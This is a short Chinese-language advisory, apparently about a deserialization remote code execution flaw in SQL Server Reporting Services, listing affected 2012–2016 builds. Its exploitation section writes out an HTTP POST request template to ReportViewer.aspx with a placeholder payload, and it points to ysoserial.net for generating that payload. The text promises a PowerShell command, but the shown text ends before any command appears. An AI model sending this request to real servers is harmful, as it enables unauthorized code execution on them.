漏洞详情

SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码
 


影响版本
SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)
SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)
SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)
SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)
SQL Server 2014 Service Pack 3 for x64-based Systems (CU)
SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)
SQL Server 2016 for x64-based Systems Service Pack 2 (CU)
SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)
 
 

漏洞利用

POST /ReportServer/pages/ReportViewer.aspx HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Content-Length: X
NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PayloadHere]&__VIEWSTATE=


可以在PowerShell中使用以下命令来使用ysoserial.net工具生成有效负载https://github.com/pwntester/ysoserial.net